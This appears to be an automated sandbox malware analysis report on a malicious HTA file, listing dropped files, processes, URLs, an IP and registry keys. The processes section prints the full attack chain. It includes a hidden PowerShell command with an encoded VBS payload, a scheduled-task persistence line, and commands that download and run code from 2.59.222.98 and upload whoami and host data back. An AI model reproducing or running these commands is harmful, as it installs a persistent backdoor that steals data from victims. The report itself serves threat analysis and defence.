C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionary0c00.lex
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QL6N3396JOR7QCQG7O4L.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 231 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\MSkUffzfPy.hta"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c kill -name mshta;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9TWnFHbnBSTEZRSXljZEtiL3BhZ2UxMTQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMTQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs -value $c;schtasks.exe /create /TN SearchUpdateTaskMachineCore /SC minute /mo 4 /tr $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs /f;;;;$temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\\appdata\local\\temp\\623-6341-11.docx -value $fil -encoding byte;&$home\\appdata\local\\temp\\623-6341-11.docx;
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN SearchUpdateTaskMachineCore /SC minute /mo 4 /tr C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs /f
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);}
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);}
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\623-6341-11.docx" /o ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://2.59.222.98:43820/SZqGnpR
unknown
 malicious
http://2.59.222.98:28402/page114
unknown
 malicious
http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt
2.59.222.98
 malicious
http://2.59.222.98:43820/SZqGnpRL
unknown
 malicious
http://2.59.222.98:43820
unknown
 malicious
http://2.59.222.9
unknown
 malicious
http://2.59.222.98:28402/page114Bytestf8.GetBytesesX
unknown
http://2.59.222.98:28402/page114X
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://github.com/Pester/Pester
unknown
http://2.59.222.98:43820(
unknown
http://schemas.opez
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://g.live.com/odclientsettings/ProdV2-C:
unknown
https://nuget.org/nuget.exe
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://go.microsoft.coyy
unknown
http://2.59.222.98:43820/szqgnprlfqiycdkb/page114/upgrade.txt
unknown
There are 19 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
2.59.222.98
unknown
Ukraine
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
?a!
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards
PageSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings
Template
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
AutoRecoverySaveIntervalMetadata
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
EcsRequestPending
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
FirstRun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
ACUpdated
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
DefaultKerningLigatures
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
